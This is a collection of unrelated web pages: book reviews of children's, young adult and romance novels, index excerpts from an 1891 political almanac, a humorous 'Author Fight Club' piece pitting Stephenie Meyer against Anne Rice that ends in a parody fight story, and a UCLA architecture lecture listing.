Best known for his deliciously amoral teenage genius, Artemis Fowl, Eoin Colfer succeeds in creating more truly memorable characters, and in not preaching in a story where the primary tension is between heaven and hell. Meg has a good heart, but she's hardly a shoo-in for the wings and the harp. Lowrie is not pitiful and pathetic, nor does Colfer overdo the crusty-old-fart stereotype when drawing this character. Even the reps from heaven and hell (St. Peter and Beelzebub, respectively) are interesting. The only character who's slightly 2-D is Belch, but he fulfills his villain duties with a mindless malevolence that is all the more unsettling when you realize he's only sixteen. Grab this book for a thought-provoking, funny look at life and what comes after.
Awards and more awards!
The 2005 Newbery and Caldecotts were announced today in San Antonio as part of the American Library Association's Midwinter Conference. Go have a look.
And I'm proud to note that I blogged one of the Printz honor books several months ago. I Am the Messenger by Marcus Zusak. The Michael L. Printz Award is given for excellence in literature written for young adults. Nice to know my taste occasionally coincides with that of authorities in the field.
Back with more books soon!
But, Bibliovore! You just posted yesterday! Usually there's about a month between posts!
I know. But I've started working at a library, which is something like Kate Moss working at a heroin factory. So hopefully you get a lot more Bibliovore posts from now on. Don't send me grumpy emails if you don't, though.
Book: Little Darlings
Author: Sam Llewellyn
Poor little Primrose, Daisy, and Cassian. Their father and stepmother spend most of the time going to fancy parties and making money, with not a moment left for raising the children. Dear, dear. But they keep themselves occupied with cookery, devious schemes, machinery, and general mayhem. Oh, and they get wonderful nannies. Nineteen, at last count.
But when the Darling household gets put on the Nanny Blacklist, their papa has no choice but to acquire one from the AAA Aardvark Childminding and Security Agency. This nanny's different. This nanny's smart enough to dodge the initial greeting (three children flying, at speed, from the end of the banister), kind enough to get them all takeout, and larcenous enough to steal all the silver. Oh, and the children. But only by accident. He (yes, he) takes them to the SS Kleptomaniac, manned entirely by inept burglars and a brilliant, beautiful captain on a mission to reassemble the parts of a royal teddy bear.
This promises to be more interesting than lessons, at any rate.
With an arch, satirical, subversive tone that hints of Lemony Snicket and Roald Dahl, Llewellyn weaves a story utterly lacking in gooey sentimentality. Daisy, Primrose, and Cassian would send Mary Poppins screaming for the hills, and that is the source of most of the enjoyment I got from this book. With equal parts deviousness, practicality, and teamwork, the siblings barrel through adventures that would send most literary children under the covers. The plot bounces and spins from one unlikely event to the next with a dark glee in the Darling childrens' capability and resourcefulness in the face of obstacles that have baffled all the adults. While the end has the potential to be a bit syrupy, the author's own wry recognition of that fact leaves you laughing. If I see anything else from Sam Llewellyn, even if it doesn't feature the Darlings, I'll be sure to pick it up.
A Year with Butch and Spike
Book: A Year With Butch and Spike
Author: Gail Gauthier
Butch and Spike Coutre are the class cut-ups. Butch is more likely to draw all over his math homework than finish it, and Spike is more likely to ask questions in class than answer them. They drive the teachers nuts, but sixth-grade teacher Mrs. McNulty has a secret weapon. His name is Jasper.
Jasper's about as close as you can get to the perfect kid. He makes straight A's. His teachers love him. He doesn't give his parents any trouble. He figures in return for all this goodness, he deserves the best sixth-grade year any kid ever had. But it doesn't look like that's going to happen . . .
It's practically a cliche - good, sweet kid makes unlikely friends with the neighborhood bully and transforms him/her (let's not be sexist here; girls are worse bullies than boys sometimes) into a human being with feelings and everything. Frankly, that's what I was expecting when I picked up A Year with Butch and Spike. To my surprise, I found that the situation is almost perfectly reversed. Jasper is at first rigidly virtuous and scarily perfectionist. But as the year goes on, he learns to see the world through the non-comformist, curious-about-everything eyes of the Coutre cousins. He does his best to maintain his position as the kid who always does the right thing and follows the rules. But as his outlook changes, he begins to realize that there are more important things than living up to a perfect scholastic standard.
I really enjoyed this book. Spike and Butch, who aren't bullies but genuinely good-hearted kids, form an entertaining duo. Mrs. McNulty is the worst example of a teacher abusing her power over the kids in her class. But it's Jasper's transformation into an actual human being instead of a teacher/grades/achievement-controlled puppet that is most compelling.
I'd Tell You I Love You, But Then I'd Have to Kill...
10 Ways Parents (inadvertantly) Discourage Their K...
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« ARC Review: ‘The Gift’ by Elise Marion
Review: ‘Primal Possession’ by Katie Reus »
Review: ‘Concealed Desire’ by Eden Summers
Concealed Desire
by Eden Summers
Published by Etopia Press on January 3, 2014
"A love that breaks all the rules..."
Since her first day at work, Beth Graison has been in love with Dean Sutherland--the "Son" in Sutherland & Son. Although he's an unrepentant player, there's an unmistakable connection between them, and she knows he feels it too. But she's not about to risk her career for any man, especially one with an office right down the hall whom she works with every day.
Dean Sutherland doesn't do love, but he does do women. And he hasn't felt more than sexual attraction for any woman until Beth. Entirely feminine, smart, and with a natural beauty beyond compare, she makes him think about all kinds of uncomfortable things--like a future and happiness--things he knows from experience are pure fiction.
When his father, the "Sutherland" in Sutherland & Son, propositions Beth to be more than just an employee, Dean can't keep her at arm's length any longer. But he doesn't expect the scorching kiss they share, or the idea that forms when he holds her in his arms. Can he stop his father's manipulating game by making the first move on Beth? Or will his reputation as a womanizer make him just one more Sutherland she wants to ignore?
This is my second book by Eden Summers that I have read and she definitely kept me turning the pages again. “Conceal Desire” is one sexy, steamy emotional book that will make your emotions go haywire. I know there were times I wanted to go through the book and slap some characters around for what they were doing or not doing. (One character who seriously was going to get slapped was Max Sutherland…I despised him)
Beth Graison has worked at Sutherland & Son for a while now and she has always respected the Sutherland guys at work…until Max Sutherland gives her a proposition, which makes her question his integrity and it bothers her more than it should. She then becomes traumatized by what Max offers her and ends up doing something that is not normal of her doing. Dean Sutherland, son of Max Sutherland, ends up helping her out because he has never seen Beth out of sorts. He has always seen her smiling and hard at work in the company.
Beth has been in love with Dean, since the first day she started working at the company. Unfortunately, Dean is her boss and he has been labeled as a player with the ladies. Beth does not want to get involved with a boss and does not want to ruin her career. Until, the one day that Dean helps her, she realizes that Dean may have another side that other women do not know about. She’s not sure if their connection is real and if Dean is just playing her around like the other women. Beth is about to find out how Dean really feels about her.
I do not want to tell more about the storyline because I am afraid I’ll give too much away. I loved reading “Concealed Desire”. I could have read it in one sitting, but of course, having two girls and a husband who loves to interrupt while I’m reading….it was not possible this week.
Dean Sutherland was one sexy male, who definitely could win me over anytime. He was such a sweetie with Beth, even when he did not know what to say because he never was in a relationship before.
Beth though was hard-headed when it came to Dean and I wish she would have listened to what Dean had to say in the beginning.
I was a little upset on what Dean’s father, Max was trying to propose to Beth and I was even more upset with what Dean’s father did before to Dean. What kind of Dad does that to their son and he wondered why Dean did not want to be close to him? Grrrr!!
Eden Summers definitely is one author who is an auto-buy for me. Her first book I read, “Sneaking a Peek” had me jumping in a cold shower after I read it and “Concealed Desire” definitely had its moments as well.
If you are a fan of Eden Summers previous books you will definitely love “Concealed Desire”.
I recommend this book to contemporary romance readers out there everywhere.
-The best part of the book was the ending with what Dean kept doing to Beth whenever he asked her something. (You’ll have to read it to find out)
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The Tribune Almanac and Political Register for ...
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Էջ 229 - ... that it is bona fide his Intention to become a citizen of the United States, and to renounce forever all allegiance and fidelity to any foreign prince, potentate, state or sovereignty, and particularly, by name to the prince, potentate, state or sovereignty of which the alien may be at the time a citizen or subject.
Էջ 36 - ... the established policy of the United States to maintain the two metals on a parity with each other upon the present legal ratio, or such ratio as may be provided by law.
Էջ 25 - Territory shall be twenty-five thousand dollars, to be applied only to instruction in agriculture, the mechanic arts, the English language and the various branches of mathematical, physical, natural and economic science, with special reference to their applications in the industries of life, and to the facilities for such instruction...
Էջ 36 - ... public and private, except where otherwise expressly stipulated in the contract.
Էջ 229 - States three years next preceding his arriving at that age, and who has continued to reside therein to the time he may make application to be admitted a citizen thereof, may, after he arrives at the age of twenty-one years, and after he has resided five years within the United States, including the three years of his minority...
Էջ 26 - Every contract, combination in form of trust or otherwise, or conspiracy in restraint of trade or commerce in any Territory of the United States or of the District of Columbia, or in restraint of trade or commecre between any such Territory and another, or between any such Territory or Territories and any State or States or the District of Columbia, or with foreign nations, or between the District of Columbia and any State or States or foreign nations, is hereby declared illegal.
Էջ 229 - States, may have become citizens of any one of the states, under the laws thereof, being under the age of twenty-one years at the time of the naturalization of their parents, shall, if dwelling in the United States, be considered as citizens thereof...
Էջ 26 - Sec. 2. Every person who shall monopolize, or attempt to monopolize, or combine or conspire with any other person or persons, to monopolize any part of the trade or commerce among the several States, or with foreign nations, shall be deemed guilty of a misdemeanor, and, on conviction thereof, shall be punished by...
Էջ 33 - That all fermented, distilled, or other intoxicating liquors or liquids transported into any state or territory or remaining therein for use, consumption, sale or storage therein, shall upon arrival in such state or territory be subject to the operation and effect of the laws of such state or territory enacted in the exercise of its police powers, to the same extent and in the same manner as though such liquids or liquors had been produced in such state or territory, and shall not be exempt therefrom...
Էջ 9 - Such depositions may be taken before any judge of any court of the United States, or any commissioner of a circuit, or any clerk of a district or circuit court, or any chancellor, justice, or judge of a supreme or superior court, mayor or chief magistrate of a city, judge of a county court, or court of common pleas of any of the United States...
Վերնագիր The Tribune Almanac and Political Register for ...
Աջակցող Horace Greeley
Հրատարակիչ Greeley & McElrath, 1891
Original from Կալիֆորնիայի համալսարան
Digitized 20 Ապրիլ 2007
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Author Fight Club: Stephenie Meyer VS Anne Rice
by Jaclyn Appelgate
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Two bestselling authors in the supernatural genre, who brought Vampires into the limelight with unique and original stories. One wrote of Vampires filled with tales sadness and grief, and the other wrote of Vampires who sparkled and loved.
Ignoring the broader themes of Chuck Palahniuk’s seminal work, Fight Club, we’re going to do what we do best and have two people fight each other.
Since we can’t talk about Fight Club (see rules one and two), we’re going to write about it. Specifically, we’re going to have two writers fight each other. Three rounds will determine their strength as we go through their power of description, their distinctive style, and their impact on the world at large.
Light your candles, for this will be a battle that the creatures of the night will surely love to sink their teeth into. Today we have Stephenie Meyer versus Anne Rice.
1-Impact and Influence
Let’s start with the very popular and well-known Stephenie Meyer.
Touted as the world’s most popular vampire novelist since Anne Rice, there isn’t a soul who hasn’t heard about Stephenie Meyer, or at least know about her hunky Vampires and Werewolves. For years all people were talking about was if they were Team Edward or Team Jacob, even if it was just in mocking.
As far as critics go, there is good and bad, but more than that there is a lot of controversy around the relationship between the main characters Bella Swan and Edward Cullen. Gizmodo wrote an article that sheds a light on the abusive nature of Bella and Edward’s relationship and how it meets all fifteen criteria set by the National Domestic Violence Hotline for being in an abusive relationship.
In spite of the controversies, there are still many who think otherwise, Meyer herself has dismissed these criticisms. While concerns of abusive relationships, which is only one example of the controversy with the Twilight novels, is very serious, it can, sadly, still be up for debate as to what a healthy relationship looks like.
The same thing goes for Feminism, another controversial issue with the Twilight books. It is a controversial issue in itself.
But all skepticism aside, Meyer’s Vampire novels were a booming success.
Image via Pinterest
With her work tied so closely to pop culture, Stephenie Meyer’s characters have been referenced several times throughout entertainment. Aside from the Twilight parodies and references throughout popular media, Stephenie Meyer’s stories also blew up the Vampire genre into mainstream pop culture, which at least count for something.
The Simpsons had a Twilight parody of their own back in 2010, where Lisa was swept off her feet by the mysterious and, of course, devilishly attractive Vampire named Edmund. As the kids would say, “Still a better love story than Twilight.”
Fun fact, Daniel Radcliffe did the voice of the Vampire Edmund
All in all, Meyer made Vampire’s entertaining, and it brought her a great deal of fame.
Meyer’s work brought her a flourishing career with a tremendous amount of recognition. Meyer was named one of MSN Lifestyle’s “Most Influential Women of 2008” where she was described as a “literary luminary”. She earned other titles similar to this, such as Vanity Fair’s list of the “Top 100 Information Age Powers” of 2009.
Even author Jodi Picoult praises Meyer and is grateful that she has “gotten people hooked on books, [which is] good for all of us.”
Of course, there are others who don’t think as highly of the Twilight author, criticizing her writing, but we’ll do some criticism of our own later on.
Image via WWD
Now onto the prestigious Anne Rice.
Most known as the author who wrote the famous Vampire novel Interview With A Vampire, as well as its sequels, the Vampire Chronicles, Rice is a bestseller author, with iconic characters and influential themes, but in spite of that she is really not that well known. Her story and characters from Interview With A Vampire are by far more famous than she is. However, for those that do know her, she is a great writer with impactful stories.
Her Vampire Chronicles novels can stand for something. More on this later in the “style” section, but Rice has admitted that she was inspired by the vampires from Gloria Holden’s characters in Dracula’s Daughter, filled with raw emotions and sensitivities, which resonated with many groups of people.
Image via aliexpress
Rice’s Vampire Chronicle series has received praise from an incredibly diverse groups of people.
Gay readers see in the vampires’ lonely, secretive search for others of their kind a metaphor for the homosexual experience. Feminists praise her strong sense of family. Experts on Christian liturgy admire Rice’s knowledge of theology, particularly her use of the eucharist as an image.
–The New York Times, 1990
On top of resonating with so many different communities, Rice’s novels have also made a huge impact on the vampire genre by flipping the book’s perspective from the victim to the Vampire. No longer did Vampire novels have to be about the poor, helpless human having their life turned upside-down, but, thanks to Anne Rice, Vampire novels can actually be about the Vampires—the struggles and pain of being a creature of darkness.
Image via Telegraph
The boy recoiled, sweat running down the sides of his face. The vampire clamped a hand on the boy’s shoulder and said, ” Believe me, I won’t hurt you. I want this opportunity. It’s more important to me than you can realize now.
–Interview With A Vampire, Ch 1
In spite of all this positive feedback from critics, and general readers as well, there is also the controversy of Anne Rice’s reaction to fanfiction.
I do not allow fan fiction. The characters are copyrighted. It upsets me terribly to even think about fan fiction with my characters. I advise my readers to write your own original stories with your own characters. It is absolutely essential that you respect my wishes.
Doesn’t sound too bad, right? Well Rice took it too far with fans by not only taking legal means to ensure that every piece of fanfiction would be taken down, but even targeted fanfiction writers, harassing them, striking fear into anyone who would even consider writing fiction about Rice’s work. There is an entire webpage warning writers against creating Anne Rice fiction, and advising them on exactly what to do if it’s already been written.
Kotaku reported on this subject of legal lawsuits and fanfiction, sharing one fanfiction writer’s terrifying experience after sharing their Anne Rice fanfiction.
The attacks [from Anne Rice’s lawyers] consisted of, amongst other things, e-mailed threats regarding not only the writing of fanfiction but any writing that any fanfic author attempted to engage in (regardless of who owned the copyright), attacks on businesses that the fanfic authors owned and weeks of harassing personal letters sent to fanfic author’s e-mail addresses and guestbooks…The threat of personal harassment is very real. Anne Rice does not want you writing fanfiction and she has the money to make you stop.
On top of that, she has built a reputation for not taking criticism well at all. In an article from The New York Times, Rice commented on many of the repeating comments claiming she needs an editor.
I have no intention of allowing any editor ever to distort, cut or otherwise mutilate sentences that I have edited and re-edited, and organized and polished myself,” she wrote. “I fought a great battle to achieve a status where I did not have to put up with editors making demands on me.
So on one hand, we have the incredibly well-known and revered Stephenie Meyer, who made reading popular with her sparkling Vampires and jacked up Werewolves (admit it, you swooned at least a little), versus the highly regarded, but generally unknown Anne Rice, who did bring the Vampire genre out of the dark, but pushed her fans over the edge.
While Rice has made such huge impacts toward her craft, because she is rather unknown outside of hardcore booknerds, and she has such a horrible reputation with those that are, or at least were, her fans, those accomplishments don’t shine as well as they could have. Whereas Stephenie Meyer has a fantastic reputation and has almost become a household name, so to speak. Maybe Meyer’s writing has been criticized by some readers and critics, more people seem to approve of her as an author in addition to the Twilight series.
It’s a very close call, but Rice’s name is just not as big or as admired.
Meyer wins this first round!
Meyer=1
Rice=0
2-Power of Description
Image via the vintage news
Who’s writing really pulled us into the scene and placed the Vampire(s) and other supernatural creatures and phenomena right before our very eyes?
Since Meyer won the last round, let’s have Rice go first again.
Here’s Anne Rice’s first description of one of her Vampires, Louis, as the reporter, known as the Boy, prepares for their interview.
The vampire was utterly white and smooth, as if he were sculpted from bleached bone, and his face was as seemingly inanimate as a statue, except for two brilliant green eyes that looked down at the boy intently like flames in a skull. But then the vampire smiled almost wistfully, and the smooth white substance of his face moved with the infinitely flexible but minimal lines of a cartoon. ” Do you see? ” he asked softly. The boy shuddered, lifting his hand as if to shield himself from a powerful light. His eyes moved slowly over the finely tailored black coat he’d only glimpsed in the bar, the long folds of the cape, the black silk tie knotted at the throat, and the gleam of the white collar that was as white as the vampire’s flesh. He stared at the vampire’s full black hair, the waves that were combed back over the tips of the ears, the curls that barely touched the edge of the white collar. ” Now, do you still want the interview? ” the vampire asked. The boy’s mouth was open before the sound came out. He was nodding. Then he said, ” Yes. ” The vampire sat down slowly opposite him and, leaning forward, said gently, confidentially, ” Don’t be afraid. Just start the tape. ”
Image via Vamped
Here we can fully see and feel the intensity of this supernatural character, the feeling of fear felt by the interviewer, and also the realization that there is more to a Vampire than what’s skin-deep. With a great deal of Rice’s explanation, she not only is letting us see what is happening on the surface, but also is painting a picture of what is being felt by the character’s themselves.
Here is Rice’s use of description when exploring the backstory of her vampire.
I remember the imported furniture that cluttered the house. ” The vampire smiled. ” And the harpsichord; that was lovely. My sister used to play it. On summer evenings, she would sit at the keys with her back to the open French windows. And I can still remember that thin, rapid music and the vision of the swamp rising beyond her, the moss-hung cypresses floating against the sky. And there were the sounds of the swamp, a chorus of creatures, the cry of the birds. I think we loved it. It made the rosewood furniture all the more precious, the music more delicate and desirable. Even when the wisteria tore the shutters oft the attic windows and worked its tendrils right into the whitewashed brick in less than a year . . . . Yes, we loved it. All except my brother. I don’t think I ever heard him complain of anything, but I knew how he felt. My father was dead then, and I was head of the family and I had to defend him constantly from my mother and sister.
With this, you have our Vampire’s history all laid out in a raw and expressive way. Louis isn’t just telling his past, he’s sharing how much it meant to him and also the minor details of his family dynamic. Not to mention when he talks about the swamp, you can really see and hear it all.
Now here’s Meyer’s first description of her Vampires.
They didn’t look anything alike. Of the three boys, one was big — muscled like a serious weight lifter, with dark, curly hair. Another was taller, leaner, but still muscular, and honey blond. The last was lanky, less bulky, with untidy, bronze-colored hair. He was more boyish than the others, who looked like they could be in college, or even teachers here rather than students.
The girls were opposites. The tall one was statuesque. She had a beautiful figure, the kind you saw on the cover of the Sports Illustrated swimsuit issue, the kind that made every girl around her take a hit on her self-esteem just by being in the same room. Her hair was golden, gently waving to the middle of her back. The short girl was pixielike, thin in the extreme, with small features. Her hair was a deep black, cropped short and pointing in every direction.
And yet, they were all exactly alike. Every one of them was chalky pale, the palest of all the students living in this sunless town. Paler than me, the albino. They all had very dark eyes despite the range in hair tones. They also had dark shadows under those eyes — purplish, bruise like shadows. As if they were all suffering from a sleepless night, or almost done recovering from a broken nose. Though their noses, all their features, were straight, perfect, angular.
-Twilight, Ch 1
Considering there are a number of characters, let’s give Meyer’s a little pass on the over-explanation. The most important thing is that we gain a sense of what these characters look like. On top of that, there is a lingering mystery on who these people are and why they appear the way they do.
Image via Hollywood
Outside of hottie Vampire teens, there are other parts to Meyer’s story that need a good description to bring it to life. Since Bella is moving in with her estranged father in the beginning of the book, let’s take a look at her first experiences in her new home.
Breakfast with Charlie was a quiet event. He wished me good luck at school. I thanked him, knowing his hope was wasted. Good luck tended to avoid me. Charlie left first, off to the police station that was his wife and family. After he left, I sat at the old square oak table in one of the three unmatching chairs and examined his small kitchen, with its dark paneled walls, bright yellow cabinets, and white linoleum floor. Nothing was changed. My mother had painted the cabinets eighteen years ago in an attempt to bring some sunshine into the house. Over the small fireplace in the adjoining handkerchief-sized family room was a row of pictures. First a wedding picture of Charlie and my mom in Las Vegas, then one of the three of us in the hospital after I was born, taken by a helpful nurse, followed by the procession of my school pictures up to last year’s. Those were embarrassing to look at — I would have to see what I could do to get Charlie to put them somewhere else, at least while I was living here.
–Twilight, Ch 1
Meyer’s description of Bella’s father’s home is clear, and like Rice it does also reveal some context clues about our heroine and her ill feelings toward her father. It also sets up the awkward dynamic that Bella and her father, Charlie, will have going forward in the story. Granted, some of the description is a bit too “on the nose”. Halfway through and til the end of what we have here is a good example of “showing, not telling”, it’s just that first half that takes one out of the moment.
Some moments of Meyer’s writing is a good balance of description and poetic prose that is written with a good pace, but, other moments are sorely lacking. We have this scene where Bella is entering her class for the first time.
The classroom was small. The people in front of me stopped just inside the door to hang up their coats on a long row of hooks. I copied them. They were two girls, one a porcelain-colored blonde, the other also pale, with light brown hair. At least my skin wouldn’t be a standout here.
While the intention of sharing Bella’s insecurity and sense of relief is an important one, this does nothing to further the plot, at least the way it’s written. More than that, Meyer, there is such a thing as too much description. Including relentless filler into your writing to attempt to hold your audience until something actually happens does not make for engaging prose. It merely tests the patience of readers who are looking for more in their plot—like actual plot.
While Rice does tend run on and on with her descriptions and writing in general, it proves to be much more engaging and bring more to the plot than what Meyer’s does.
Point to Rice!
3-STYLE (Who has the best Vampire?)
Image via Knowyourmeme
If only we could have Sesame Street’s Vampire in this battle of bloodsuckers, he would win in a single count! Alas, it cannot be. So here we are at the nitty-gritty, the finale. Who’s style and who’s Vampires reign supreme? Let’s dig in to find out!
Let’s switch things up a little and let Meyer take the stage next.
Now we can see with Meyer’s style of writing there is a lot that leaves the reader wanting. With such a slow pace in the plot and too much description throughout, it can be such a challenge to read through her novel.
At least she has a sense of humor…
I stuffed everything in my bag, slung the strap over my shoulder, and sucked in a huge breath. I can do this, I lied to myself feebly. No one was going to bite me. I finally exhaled and stepped out of the truck.
Who doesn’t love a little irony? “No one was going to bite me”, huh? Oh Bella how wrong you are.
Image via Bustle
Aside from a little entertainment and some good quality prose here and there, Meyer’s writing is quite frankly terrible. It’s more so the romance and the supernatural society that is most engaging.
The basic rules for Vampires, and Werewolves, apply here, except the fact that these Vampire can actually stand in the sunlight without burning. Instead, they sparkle!
Image via goodreads
While the mass majority of us were offended at the thought of a sparkling Vampire, some of us even broke down in laughter, there are some people who took the change in stride, which honestly I can respect. But I digress.
Vampires. Do. Not. Sparkle!!
Alright, now that I let that out of my system, more on the Vampire and Werewolf society.
Image via Popmatters
Meyer continues her creative streak by making an diverse society of her Vampires and Werewolves, with different covens of Vampires and their own unique culture and set of rules to abide by. This helps to really spice up the plot with ever-changing dynamics in drama from one problem to the next.
Now onto Rice.
In spite of the author’s horrible character in question, Rice’s fictional characters are given praise for their dynamics and relatability. As mentioned before, Rice made a drastic change to the Vampire genre by making the Vampires the main characters and unveiling their very human characteristics, take this exchange during the interview.
” Ah, that’s the accent . . . ” the boy said softly. For a moment the vampire stared blankly. ” I have an accent? ” He began to laugh. And 3 the boy, flustered, answered quickly. ” I noticed it in the bar when I asked you what you did for a living. It’s just a slight sharpness to the consonants, that’s all. I never guessed it was French. ” ” It’s all right, ” the vampire assured him. ” ran not as shocked as I pretend to be. It’s only that I forget it from time to time. But let me go on. . . . ‘
Although the scene is brief and simple, Rice reveals a little about Louis without telling us point blank. It’s a mild moment of entertainment that, on top of fleshing out her character, also establishes a growing relationship between the two characters a scene that is very human. Normal conversations, even with a Vampire I can assume, aren’t cut and dry, and there are times when people interrupt others, joke with one another, and potentially stray off topic. We are imperfect creatures after-all, and this scene captures just that, a raw, authentic conversation.
On top of that, Rice has made up a Vampire society of her own, just much less organized. On the Vampire Louis’ travels, he comes across a variety of characters including a theater troupe of Vampire who, in front of a live studio audience, feast upon their victims, assumed by the audience to be very good actors a part of the production. Horrifyingly creative, isn’t it?
Image via 25yearslatersite
There is even more to happen in Louis tragic life as a creature of the night. The plot tackles the controversy of the Vampires need to feast on humans, and also the never-ending frustration of immortality. Take the character Claudia for example. She is a mere child when she is turned, and the disdain and frustration she feels of having the mentality of a 30-year-old with the body of a 5-year-old is a lot to bear—can you imagine after a long, hard day being stuck at the kids table when you need a hard drink of tequila?! I wouldn’t wish that on my worst enemy!
There are a lot of different plot lines occurring, intermingling, and colliding with the opinions and feelings of other characters surrounding Louis.
Rice takes a good look at the possible life of these cursed, bloodsucking creatures, while Meyer takes those concepts, organizes them in a rather nice package, and smothers it with romance and hot sparkling bods.
At the end of the day, the two authors do a good job at creating an open world. Meyer’s story is for a much younger audience, while Rice is intensely more mature.
The one thing that separates the two is their characterization. While each of Meyer’s character has their own set role to play in this very straight-laced, supernatural saga, Rice’s characters are their own. They don’t even seem to be created, they just are who they are, which for a heavy genre like Vampire literature, that’s pretty important.
Although Meyer’s intended audience is younger, that doesn’t mean everything has to be so cut in dry. To stray just a little off topic, there are many stories, even ones for children, that can be a little on the chaotic and profound side. Young people go through their own dramas of chaos in life—we’ve all been through middle and high school guys, come one!—and it was for sure not all centered around the deep romance we had with the mysterious hottie.
Rice’s characters and Vampires are much better than Meyer’s by far!
Rice wins!
Brought to us by the Fabulous Zariah
A heavy fog hung in the sky and a cold chill was attached to it. Stephenie Meyer shuttered before wrapping her sweater closer around her. The forest that surrounded Forks, Washington was colder than she remembered and a lot quieter. Her own breathing was all she could hear until the soft shuffling of feet against the forest floor. Meyer swiftly turned around and through the fog walked a figure shrouded in black.
The shrouded figure raised their hood and underneath it was revealed to be Ann Rice. Her gray hair bluntly cut and she wore an unamused smirk across her lips.
“A home advantage won’t do you any good, Stephenie.” Rice pulled off her black velvet gloves delicately before putting them in her handbag.
“I’m sorry, who are you?”
Anne Rice scoffed. “Oh, please, don’t act cute. This has been years in the making.” She took her cloak off, folded it and put it the base of a large tree along with her purse. “And it will be over swiftly.”
Meyer rolled up the sleeves of her cardigan. “Fine, old woman. I can take you on in my sleep.”
“Sleep? Wasn’t that the excuse that helped spawn your so called books?”
Meyer glared and walked closer to Rice but stopped once she raised her hand.
“I’d prefer not to get my hands dirty if that’s alright with you.” Rice motioned and through the trees emerged two men. Louis de Pointe du Lac and Lestat de Lioncourt stood proudly behind their creator. The men were in Victorian era clothing, their long hair rested on their backs. Their eyes were piercing, bright and unmoving. Each took a knee and kissed the back of her hands.
“Adorable.” Meyer clapped her hands. She sneers at the woman before whistling. Behind Meyer, two of her own blood drinkers emerged and besides them was a massive wolf. Edward Cullen in all of his bronze spikey glory stood with his adopted father Carlisle, looking strangely similar to Lestat. A low growl escaped Jacob Black’s throat as he readied his attack stance. He stared intensely at the rival vampires.
“Allons-y.” Rice sat on a lavish chair and pulled a cup of tea from the shadows behind her and began to sip it.
All of the vampires and wolf rushed each other and the sound of their collision echoed through out the forest.
“We don’t have to do this, you know!” Meyer called over the fighting. “I’m a huge fan.”
“Of course you are darling.” Rice said calmly, even over the snapping and clawing she didn’t need to yell. Her voice resounded clearly into Meyer’s ears.
“You are so pretentious!” Meyer yelled. “How you have a fan base is beyond me!”
Edward, suddenly filled with more than he ever felt reared back and punched Louis so hard that he flew back yards and obliterated several trees into splinters and dust. All of the fighting ceased for a few moments. Meyer looked at the result of her insult and laughed loudly. Without setting her tea cup down, Rice’s eyes flicker quickly to where one of her fighters got knocked to and back to Meyer.
“Your so called fans were nothing more than adolescent children who were brainwashed into thinking that having someone sneak into their room and watch them sleep was romantic.”
Lestat pulled his hair back before going straight for Carlisle, one on one. The Frenchman body slams the doctor layers deep in the ground, causing the earth to shake at an alarming rate.
Meyer steadied herself against a tree. “At least my fans actually like me. The can write fan fiction whenever they want.” Louis ran back to the fight, jumping over exposed roots and cracking ground. He propels himself over the wolf and wraps his arms around his torso and squeezed tightly. Jacob whined momentarily before twisting out of his hold and head butted the vampire back. The large wolf then takes his paw and slams it onto Louis’ chest as the earth stopped rumbling.
“I encourage my readers to write their own stories, with their own characters not retread trash like yours over and over again.” Rice set her tea down the on the side that appeared but it seemed like it had always been there with black roots that had grown up it’s legs. “My characters belong to me.”
Louis got the upper hand on the wolf and rolled from underneath him. He got his arms around Jacob’s throat and twisted. He broke the wolf’s neck and as Jacob died the color drained from his eyes. He casually brushed away the dirt and debris on his velvet jacket.
“No!” Meyer yelled in anguish. Her nose began to bleed and she wiped it away in shock. “You, hag; so cosplay is suddenly okay? Generations were inspired by you and you give them the okay to play dress up?!”
Carlisle and Edward regroup as it was just the vampires left. A silence fell over everyone as they sized each other up.
“We are nothing without them!” Edward and Louis resumed fighting, before his father and his opponent went head to head. They all dodging each other’s head on attacks. “You are nothing without them.”
The mind reader got the fancy dressed vampire on his knees and put him in a choke hold. Carlisle broke free and from Lestat and slammed his fist onto Louis’ head, chopping it right off. Blood pooled from the headless body and soaked the dirt beneath their feet.
Rice clutched her abdomen and coughed violently. Blood dripped from her lips but she blotted her chin with a white handkerchief she pulled from her sleeve. Meyer continued to wipe her nose as well.
“You might as well give up, Anne, the odds don’t seem to be in your favor.”
“Please, stop referencing better books, it should be beneath you.” Rice coughed. For the first time in the entire battle she stood up. Lestat grabbed each vampire by the throat.
“My books are classic; your success was a fluke,” Lestat chuckled as the vampires tried to escape his grasp. “You tricked an entire decade into worshipping you for nothing.”
“And at least the vampires I created are original, yours are a pale imitation of mine.” Lestat raised the vampires up until their feet were off the ground. His laughter grew until he sounded like he was on the brink of insanity.
“You are nothing without me.”
Lestat ended the sparkly vampires by knocking them together so hard they exploded. Sparkles rained down over Lestat and he smiled wildly like a child playing the snow.
Meyer fell to the ground clutching her chest, she watched as Anne Rice, the victor walked over to her. Rice pulled Meyer’s hair, yanking her head back so she would be the last thing she would ever see.
“Quality over quantity, always wins darling.” Rice smiled. Lestat takes Rice’s arm and they walk back through the trees and fog rolled over Meyer’s body.
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Author Fight Club
‘All the Bright Places’ is Coming to Netflix
How The Famous Library Cake Came To Be
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Lecture with Dominic Leong
Monday, Feb 3, 20206:30 PM - 8 PMPDT
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We look forward to welcoming Dominic Leong, Founding Partner of Leong Leong and Adjunct Assistant Professor at Columbia GSAPP, on Monday, February 3, 2020, as part of our 2019-20 Event Series.
Dominic received his Master of Science in Advanced Architectural Design from Columbia University, graduating with Honors, and his Bachelor of Architecture from California Polytechnic State University, San Luis Obispo. He has lived and worked in Shanghai, Paris, and New York. In 2007, he was awarded the Architecture League Prize by The Architectural League of New York. Dominic has received recognition for his work that includes a Graham Foundation Grant for his interest in the role of research in contemporary architectural education and practice. Dominic is currently Adjunct Assistant Professor at the Columbia University Graduate School of Architecture, Planning and Preservation, where he teaches Advanced Design Studio. He has been invited to speak about Leong Leong’s work at a wide range of institutions, including Columbia University, Princeton University, UCLA, Yale University, American Institute for Architects, and the US Pavilion at the 14th Venice Biennale. Dominic serves on GSAPP Alumni Board. Dominic is a registered architect in the State of New York and Florida.
All lectures take place at 6:30 PM in the Decafe at Perloff Hall on UCLA's Westwood campus in Los Angeles. Short-term parking options are available in lots and structures located throughout campus. For more parking information, click here.
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Thu, May 14 - Sat, May 16, 2020
Lecture with Tei Carpenter
ucla ● lecture ● dominic leong ● los angeles ● california ● usa
University of California, Los Angeles (UCLA)
LEONG LEONG
Nature—Cooper Hewitt Design Triennial
May 10 - Jan 20, 2020
Made in Tokyo: Architecture and Living, 1964/2020
Oct 11 - Jan 26, 2020
Frank Lloyd Wright Textiles: The Taliesin Line, 1955-60
May 20 - Apr 5, 2020
